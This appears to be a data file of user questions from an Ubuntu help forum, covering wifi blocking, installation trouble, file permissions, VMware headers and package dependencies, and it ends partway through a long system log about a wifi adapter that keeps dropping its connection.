444502	ubuntu 12.4 lts wifi disabled	aliandena @ aliandena-hp-510-notebook-pc-ru962aa-abu : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes aliandena @ aliandena-hp-510-notebook-pc-ru962aa-abu : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11bg essid : off/any mode : managed channel:0 access point : not-associated bit rate:0 kb/s tx-power=off sensitivity=8/0 retry limit:7 rts thr : off fragment thr : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 aliandena @ aliandena-hp-510-notebook-pc-ru962aa-abu : ~ $ helpline . using a paid for installation dvd of ubuntu 12.4 lts 32 bit i did a clean install ( xp deleted during install ) on my hp 510 notebook the download was successful and the operating system is working well , my router is connected via an ethernet cable as the wifi has been hard blocked during the installation . the hp 510 notebook has an on/off push button which is always `` blue '' when wifi is enabled but now does not respond when pressed . i have been unable to resolve this problem despite several attempts using various methods from other ubuntu users who also had this same glitch . i would appreciate your advice on a remedy for my disabled wifi . thank you , al smith my apologies for my lack of knowledge in all things ubuntu . having had a speedy reply to my above question i now need to supply my adviser with an image showing the results from his request for more information . the image/screenshot from my `` terminal '' has to be added to this edited question but i am at a loss as to how it can be transferred or uploaded . i would be obliged if you would be as kind as direct me on the process . i have attached the information from my `` terminal '' after having run the two commands that you advised , it appears at the very start of this page thank you again for your advice and continuing assistance . -- al smith
444503	no mouse when installing	when installing 12.04.4 from dvd i have no mouse anymore . i try installing the 32 bit version , tried with a usb-mouse ( logitech ) and also with a mouse with green round connector . both do n't work . installation is impossible in this way .
444505	how to change location of .config directory	my home directory is located on a network filer with fixed quota . i 'm running out of my quota as different applications saving their data in home directory . for example google-chrome , storing data in .config directory . how can i change the location of default location to some other location ( to local storage if hostname==mymachine ) ? i tried to use solution from this link , but no luck .
444506	android device manager doesnt show emulated device on ubunut 12.04	in the android avd manager ( eclipse or android studio , doesnt matter ) i can create a device , but when i want to start it , the avd manager loads and nothing happen . did anybody know what could be the problem ?
444509	proper permissions on web directory	i have a problem with trying to give the permissions on the web directory . i 've changed the group owner of /var/www to www-data and i 've added the user amitger1 ( ftp user who uploads the files to the web directory ) to the www-data group , then i 've set the permissions to 770 but when i upload a new file it appears with 600 permissions . how can i do to change the permissions of all the new files to 770 ?
444510	copy , rename & repeat	i wish to copy an image ( grey.png ) and rename it as multiple different images , i have a list of the names ( pastebin ) is there any way ? ( running 13.10 )
444511	header path during installation vmware	i have installed vmware on ubuntu 13.10 but when i launch it then a message said that i have to specify the path for the linux-headers-3.11.0-19-generic . now i 'm not expert on linux , i give the command `` uname -a '' here the result : linux mariop 3.11.0-19-generic # 33-ubuntu my knowledge of linux kernel stops here . can you help me ?
444512	how to call a script to remove apt-get cache when dpkg installation fails while checking for dependencies in control file provided to equivs-build ?	i have created a deb package abc.deb which successfully installs one application ( web-server ) when all dependencies ( like python-dev , python-pip , etc ) specified in depends : < list of dependensies > parameter of control file provided to equivs-build tool . but when dependencies are not matched , i get an error dpkg : dependency problems prevent configuration of abc : abc depends on python-mysql ; however : package python-mysql is not installed . the problem here is : after such unsuccessful installation , when i try to use apt-get install for other packages i get an error as : the following packages have unmet dependencies : abc : depends : python-mysql but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . how and where can i catch this dependency error and how can i then remove the apt-get cache ( note : i ca n't use dpkg -r abc as dpkg would already be running ) .
444513	dell inspiron n4110 battery indicator flashing orange	so this does not happen while i 'm on windows . when my battery is fully charged and i leave the power cord on , after awhile the battery gets really hot and the battery indicator on the front of my laptop starts flashing 4 times in orange . i 've searched for this problem but i do n't seem to have the exact error the people who have this problem are facing ( when they pull out the power cord the laptop instantly shuts down , mine just works fine if i pull it out ) . i tried installing tlp and starting the service and for a good 2-3 days it 's work fine , no orange light flashes but just 20 minute ago i get it back .
444519	my wifi stops working after browsing the web	so i am using ubuntu 13.10 and i have this usb wifi device ( tp-link tl-wn821n v4 ) in my computer . now when i use internet via terminal , everything is just fine , i can upload and download the whole internet if i want to . but once i open up a browser ( does not matter if firefox or chromium ) , i can navigate to like 4 pages and then my connection stops . i can still see that i am connected but i can not use the internet anymore . also when i disconnect from the currently connected network , i will not be able to reconnect there anymore . this problem for now is only fixed with a restart . so for every 4 pages i visit , restart . i have also gotten some logs and info : syslog : apr 7 16:55:11 kaspar-all-series colord : using mapping database file /var/lib/colord/mapping.db apr 7 16:55:11 kaspar-all-series colord : using device database file /var/lib/colord/storage.db apr 7 16:55:11 kaspar-all-series colord : loaded plugin libcd_plugin_scanner.so apr 7 16:55:11 kaspar-all-series colord : plugin /usr/lib/x86_64-linux-gnu/colord-plugins/libcd_plugin_sane.so not loaded : plugin refused to load apr 7 16:55:11 kaspar-all-series colord : loaded plugin libcd_plugin_camera.so apr 7 16:55:11 kaspar-all-series colord : daemon ready for requests apr 7 16:55:11 kaspar-all-series dbus [ 698 ] : [ system ] successfully activated service 'org.freedesktop.colormanager' apr 7 16:55:11 kaspar-all-series colord : profile added : icc-b920cdc20756e05653f42f9f171ecec9 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-bbb2b6d0b2f673b7e0b5066a257fc194 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-2aab7bab389c800a5a8cb31a7d6ba1ef apr 7 16:55:11 kaspar-all-series colord : profile added : icc-7da256bc299fa3e414b0d5bfef41697d apr 7 16:55:11 kaspar-all-series colord : profile added : icc-10f8fa4e3eae00a31f679de411c9c737 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-0075bbf6787fe025e3e8be7c60ab1cc0 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-ec9cedcd8450615939a12ac24ec5e8dc apr 7 16:55:11 kaspar-all-series colord : profile added : icc-f719b10f8219a720944043462516a013 apr 7 16:55:11 kaspar-all-series kernel : [ 20.269308 ] adding 8292348k swap on /dev/mapper/cryptswap1 . priority : -1 extents:1 across:8292348k fs apr 7 16:55:11 kaspar-all-series colord : profile added : icc-a3fb06a189e5654272f614e56cd57921 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-68e72a11d2fc535f7d3c7d157432bbd1 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-0efe0c4cd9b09c72ff5b0d407ebdbd80 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-c7db4d1010988277db4d076f37757a01 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-93945c373d44de2f7199fc8b0782fadf apr 7 16:55:11 kaspar-all-series colord : profile added : icc-3ad3ba8e09b76fa91573dc2f1aad6e98 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-0fb902a132159af7eee4a70af0921c06 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-f3f81cb5b41e8de556fdcc01ccb29c5f apr 7 16:55:11 kaspar-all-series colord : profile added : icc-9d21c156e7631af5bc00bec7b35c31a9 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-bab0d408ed0547d599c49f07675cdffc apr 7 16:55:11 kaspar-all-series colord : profile added : icc-e209f6f1e897d6fbc3bbc66e21fe46a9 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-3660934ca71cad605724215aa7e6a5a4 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-a5cf2e0debcd2aed283c58d15ca28da9 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-465d1507ae264c466248b7efc1f2ee22 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-33eef553a4017f238711fb8afc0d6e87 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-66cedf35b4ba8c0be05be4e53ee68bbe apr 7 16:55:11 kaspar-all-series colord : device added : xrandr-benq-benq xl2411t-8cd00558sl0 apr 7 16:55:11 kaspar-all-series colord : automatic metadata add icc-68c96ce83f512dee5e392b42240c6483 to xrandr-benq-benq xl2411t-8cd00558sl0 apr 7 16:55:11 kaspar-all-series colord : profile added : icc-68c96ce83f512dee5e392b42240c6483 apr 7 16:55:11 kaspar-all-series whoopsie [ 1018 ] : online apr 7 16:55:11 kaspar-all-series dbus [ 698 ] : [ system ] activating service name='org.freedesktop.realtimekit1 ' ( using servicehelper ) apr 7 16:55:11 kaspar-all-series dbus [ 698 ] : [ system ] successfully activated service 'org.freedesktop.realtimekit1' apr 7 16:55:11 kaspar-all-series rtkit-daemon [ 1676 ] : successfully called chroot . apr 7 16:55:11 kaspar-all-series rtkit-daemon [ 1676 ] : successfully dropped privileges . apr 7 16:55:11 kaspar-all-series rtkit-daemon [ 1676 ] : successfully limited resources . apr 7 16:55:11 kaspar-all-series rtkit-daemon [ 1676 ] : running . apr 7 16:55:11 kaspar-all-series rtkit-daemon [ 1676 ] : canary thread running . apr 7 16:55:11 kaspar-all-series rtkit-daemon [ 1676 ] : watchdog thread running . apr 7 16:55:11 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 1674 of process 1674 ( n/a ) owned by '111 ' high priority at nice level -11 . apr 7 16:55:11 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 1 threads of 1 processes of 1 users . apr 7 16:55:12 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 1726 of process 1674 ( n/a ) owned by '111 ' rt at priority 5 . apr 7 16:55:12 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 2 threads of 1 processes of 1 users . apr 7 16:55:12 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 1727 of process 1674 ( n/a ) owned by '111 ' rt at priority 5 . apr 7 16:55:12 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 3 threads of 1 processes of 1 users . apr 7 16:55:12 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 1728 of process 1674 ( n/a ) owned by '111 ' rt at priority 5 . apr 7 16:55:12 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 4 threads of 1 processes of 1 users . apr 7 16:55:12 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 1730 of process 1730 ( n/a ) owned by '111 ' high priority at nice level -11 . apr 7 16:55:12 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 5 threads of 2 processes of 1 users . apr 7 16:55:12 kaspar-all-series pulseaudio [ 1730 ] : [ pulseaudio ] pid.c : daemon already running . apr 7 16:55:16 kaspar-all-series ntpdate [ 1380 ] : adjust time server 91.189.89.199 offset 0.009931 sec apr 7 16:55:17 kaspar-all-series lightdm : pam_ecryptfs : passphrase file wrapped apr 7 16:55:17 kaspar-all-series colord : device removed : xrandr-benq-benq xl2411t-8cd00558sl0 apr 7 16:55:17 kaspar-all-series colord : profile removed : icc-68c96ce83f512dee5e392b42240c6483 apr 7 16:55:17 kaspar-all-series bumblebeed [ 1775 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1790 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1804 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1813 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1823 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1833 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1843 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1852 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1862 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1871 ] : no integrated video card found , quitting . apr 7 16:55:17 kaspar-all-series bumblebeed [ 1880 ] : no integrated video card found , quitting . apr 7 16:55:18 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 2075 of process 2075 ( n/a ) owned by '1000 ' high priority at nice level -11 . apr 7 16:55:18 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 5 threads of 2 processes of 2 users . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 2211 of process 2075 ( n/a ) owned by '1000 ' rt at priority 5 . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 6 threads of 2 processes of 2 users . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 2212 of process 2075 ( n/a ) owned by '1000 ' rt at priority 5 . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 7 threads of 2 processes of 2 users . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 2213 of process 2075 ( n/a ) owned by '1000 ' rt at priority 5 . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 8 threads of 2 processes of 2 users . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 2215 of process 2215 ( n/a ) owned by '1000 ' high priority at nice level -11 . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 9 threads of 3 processes of 2 users . apr 7 16:55:19 kaspar-all-series pulseaudio [ 2215 ] : [ pulseaudio ] pid.c : daemon already running . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : successfully made thread 2218 of process 2218 ( n/a ) owned by '1000 ' high priority at nice level -11 . apr 7 16:55:19 kaspar-all-series rtkit-daemon [ 1676 ] : supervising 9 threads of 3 processes of 2 users . apr 7 16:55:19 kaspar-all-series pulseaudio [ 2218 ] : [ pulseaudio ] pid.c : daemon already running . apr 7 16:55:19 kaspar-all-series dbus [ 698 ] : [ system ] activating service name='org.freedesktop.locale1 ' ( using servicehelper ) apr 7 16:55:19 kaspar-all-series dbus [ 698 ] : [ system ] successfully activated service 'org.freedesktop.locale1' apr 7 16:55:19 kaspar-all-series colord : device added : xrandr-benq-benq xl2411t-8cd00558sl0 apr 7 16:55:19 kaspar-all-series colord : automatic metadata add icc-fe9ab04f6dcf3546f8a69b3110e4d1c4 to xrandr-benq-benq xl2411t-8cd00558sl0 apr 7 16:55:19 kaspar-all-series colord : profile added : icc-fe9ab04f6dcf3546f8a69b3110e4d1c4 apr 7 16:55:19 kaspar-all-series dbus [ 698 ] : [ system ] activating service name='org.freedesktop.udisks2 ' ( using servicehelper ) apr 7 16:55:19 kaspar-all-series udisksd [ 2282 ] : udisks daemon version 2.1.0 starting apr 7 16:55:20 kaspar-all-series dbus [ 698 ] : [ system ] successfully activated service 'org.freedesktop.udisks2' apr 7 16:55:20 kaspar-all-series udisksd [ 2282 ] : acquired the name org.freedesktop.udisks2 on the system message bus apr 7 16:55:26 kaspar-all-series wpa_supplicant [ 1015 ] : wlan0 : wpa : group rekeying completed with 00:0e:2e:6e : f4 : ca [ gtk=ccmp ] apr 7 16:55:26 kaspar-all-series whoopsie [ 1018 ] : online apr 7 16:55:27 kaspar-all-series whoopsie [ 1018 ] : online apr 7 16:55:28 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . apr 7 16:55:28 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 7 16:55:28 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 7 16:55:28 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . apr 7 16:56:08 kaspar-all-series whoopsie [ 1018 ] : online apr 7 16:56:09 kaspar-all-series whoopsie [ 1018 ] : online apr 7 16:57:18 whoopsie [ 1018 ] : last message repeated 3 times apr 7 16:57:26 kaspar-all-series dbus [ 698 ] : [ system ] activating service name='org.freedesktop.hostname1 ' ( using servicehelper ) apr 7 16:57:26 kaspar-all-series dbus [ 698 ] : [ system ] successfully activated service 'org.freedesktop.hostname1' apr 7 16:58:17 kaspar-all-series whoopsie [ 1018 ] : online apr 7 16:59:26 whoopsie [ 1018 ] : last message repeated 2 times apr 7 17:00:36 whoopsie [ 1018 ] : last message repeated 2 times apr 7 17:02:49 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : device state change : activated - > disconnected ( reason 'user-requested ' ) [ 100 30 39 ] apr 7 17:02:49 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : deactivating device ( reason 'user-requested ' ) [ 39 ] apr 7 17:02:49 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 1194 apr 7 17:02:49 kaspar-all-series avahi-daemon [ 823 ] : withdrawing address record for fe80 : :a2f3 : c1ff : fe1c : a4a8 on wlan0 . apr 7 17:02:49 kaspar-all-series avahi-daemon [ 823 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :a2f3 : c1ff : fe1c : a4a8 . apr 7 17:02:49 kaspar-all-series avahi-daemon [ 823 ] : interface wlan0.ipv6 no longer relevant for mdns . apr 7 17:02:49 kaspar-all-series avahi-daemon [ 823 ] : withdrawing address record for 192.168.2.103 on wlan0 . apr 7 17:02:49 kaspar-all-series avahi-daemon [ 823 ] : leaving mdns multicast group on interface wlan0.ipv4 with address 192.168.2.103 . apr 7 17:02:49 kaspar-all-series avahi-daemon [ 823 ] : interface wlan0.ipv4 no longer relevant for mdns . apr 7 17:02:49 kaspar-all-series networkmanager [ 968 ] : < warn > dns : plugin dnsmasq update failed apr 7 17:02:49 kaspar-all-series networkmanager [ 968 ] : < info > removing dns information from /sbin/resolvconf apr 7 17:02:49 kaspar-all-series dnsmasq [ 1252 ] : setting upstream servers from dbus apr 7 17:02:49 kaspar-all-series kernel : [ 478.926346 ] wlan0 : deauthenticating from 00:0e:2e:6e : f4 : ca by local choice ( reason=3 ) apr 7 17:02:49 kaspar-all-series wpa_supplicant [ 1015 ] : wlan0 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 apr 7 17:02:49 kaspar-all-series kernel : [ 478.928513 ] cfg80211 : calling crda to update world regulatory domain apr 7 17:02:49 kaspar-all-series kernel : [ 478.934237 ] cfg80211 : world regulatory domain updated : apr 7 17:02:49 kaspar-all-series kernel : [ 478.934245 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 7 17:02:49 kaspar-all-series kernel : [ 478.934251 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 7 17:02:49 kaspar-all-series kernel : [ 478.934255 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 7 17:02:49 kaspar-all-series kernel : [ 478.934258 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 7 17:02:49 kaspar-all-series kernel : [ 478.934261 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 7 17:02:49 kaspar-all-series kernel : [ 478.934264 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 7 17:02:49 kaspar-all-series whoopsie [ 1018 ] : offline apr 7 17:02:49 kaspar-all-series dbus [ 698 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 7 17:02:49 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected apr 7 17:02:49 kaspar-all-series dbus [ 698 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' apr 7 17:02:50 kaspar-all-series avahi-daemon [ 823 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :a2f3 : c1ff : fe1c : a4a8 . apr 7 17:02:50 kaspar-all-series avahi-daemon [ 823 ] : new relevant interface wlan0.ipv6 for mdns . apr 7 17:02:50 kaspar-all-series avahi-daemon [ 823 ] : registering new address record for fe80 : :a2f3 : c1ff : fe1c : a4a8 on wlan0.* . apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) starting connection 'seened' apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0/wireless ) : access point 'seened ' has security , but secrets are required . apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . apr 7 17:02:52 kaspar-all-series whoopsie [ 1018 ] : offline apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0/wireless ) : connection 'seened ' has security , and secrets exist . no new secrets needed . apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > config : added 'ssid ' value 'seened' apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > config : added 'scan_ssid ' value '1' apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > config : added 'auth_alg ' value 'open' apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > config : added 'psk ' value ' < omitted > ' apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > config : set interface ap_scan to 1 apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 7 17:02:52 kaspar-all-series wpa_supplicant [ 1015 ] : wlan0 : sme : trying to authenticate with 00:0e:2e:6e : f4 : ca ( ssid='seened ' freq=2462 mhz ) apr 7 17:02:52 kaspar-all-series kernel : [ 482.307255 ] wlan0 : authenticate with 00:0e:2e:6e : f4 : ca apr 7 17:02:52 kaspar-all-series kernel : [ 482.308277 ] wlan0 : send auth to 00:0e:2e:6e : f4 : ca ( try 1/3 ) apr 7 17:02:52 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating apr 7 17:02:53 kaspar-all-series kernel : [ 483.167399 ] wlan0 : send auth to 00:0e:2e:6e : f4 : ca ( try 2/3 ) apr 7 17:02:54 kaspar-all-series kernel : [ 484.192226 ] wlan0 : send auth to 00:0e:2e:6e : f4 : ca ( try 3/3 ) apr 7 17:02:55 kaspar-all-series kernel : [ 485.169011 ] wlan0 : authentication with 00:0e:2e:6e : f4 : ca timed out apr 7 17:02:55 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > disconnected apr 7 17:02:55 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 7 17:02:56 kaspar-all-series wpa_supplicant [ 1015 ] : wlan0 : sme : trying to authenticate with 00:0e:2e:6e : f4 : ca ( ssid='seened ' freq=2462 mhz ) apr 7 17:02:56 kaspar-all-series kernel : [ 485.982272 ] wlan0 : authenticate with 00:0e:2e:6e : f4 : ca apr 7 17:02:56 kaspar-all-series kernel : [ 485.982786 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 1/3 ) apr 7 17:02:56 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating apr 7 17:02:56 kaspar-all-series kernel : [ 486.185834 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 2/3 ) apr 7 17:02:56 kaspar-all-series kernel : [ 486.389998 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 3/3 ) apr 7 17:02:57 kaspar-all-series kernel : [ 486.594162 ] wlan0 : authentication with 00:0e:2e:6e : f4 : ca timed out apr 7 17:02:57 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > disconnected apr 7 17:02:57 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 7 17:02:57 kaspar-all-series wpa_supplicant [ 1015 ] : wlan0 : sme : trying to authenticate with 00:0e:2e:6e : f4 : ca ( ssid='seened ' freq=2462 mhz ) apr 7 17:02:57 kaspar-all-series kernel : [ 487.411433 ] wlan0 : authenticate with 00:0e:2e:6e : f4 : ca apr 7 17:02:57 kaspar-all-series kernel : [ 487.412028 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 1/3 ) apr 7 17:02:57 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating apr 7 17:02:58 kaspar-all-series kernel : [ 487.614987 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 2/3 ) apr 7 17:02:58 kaspar-all-series kernel : [ 487.819151 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 3/3 ) apr 7 17:02:58 kaspar-all-series kernel : [ 488.023313 ] wlan0 : authentication with 00:0e:2e:6e : f4 : ca timed out apr 7 17:02:58 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > disconnected apr 7 17:02:58 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 7 17:02:59 kaspar-all-series wpa_supplicant [ 1015 ] : wlan0 : sme : trying to authenticate with 00:0e:2e:6e : f4 : ca ( ssid='seened ' freq=2462 mhz ) apr 7 17:02:59 kaspar-all-series kernel : [ 488.836605 ] wlan0 : authenticate with 00:0e:2e:6e : f4 : ca apr 7 17:02:59 kaspar-all-series kernel : [ 488.837098 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 1/3 ) apr 7 17:02:59 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating apr 7 17:02:59 kaspar-all-series kernel : [ 489.040139 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 2/3 ) apr 7 17:02:59 kaspar-all-series kernel : [ 489.244301 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 3/3 ) apr 7 17:03:00 kaspar-all-series kernel : [ 489.448470 ] wlan0 : authentication with 00:0e:2e:6e : f4 : ca timed out apr 7 17:03:00 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > disconnected apr 7 17:03:00 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 7 17:03:00 kaspar-all-series wpa_supplicant [ 1015 ] : wlan0 : sme : trying to authenticate with 00:0e:2e:6e : f4 : ca ( ssid='seened ' freq=2462 mhz ) apr 7 17:03:00 kaspar-all-series kernel : [ 490.269716 ] wlan0 : authenticate with 00:0e:2e:6e : f4 : ca apr 7 17:03:00 kaspar-all-series kernel : [ 490.270177 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 1/3 ) apr 7 17:03:00 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating apr 7 17:03:01 kaspar-all-series kernel : [ 490.473263 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 2/3 ) apr 7 17:03:01 kaspar-all-series kernel : [ 490.677427 ] wlan0 : direct probe to 00:0e:2e:6e : f4 : ca ( try 3/3 ) apr 7 17:03:01 kaspar-all-series kernel : [ 490.881596 ] wlan0 : authentication with 00:0e:2e:6e : f4 : ca timed out apr 7 17:03:01 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > disconnected apr 7 17:03:01 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 7 17:03:04 kaspar-all-series networkmanager 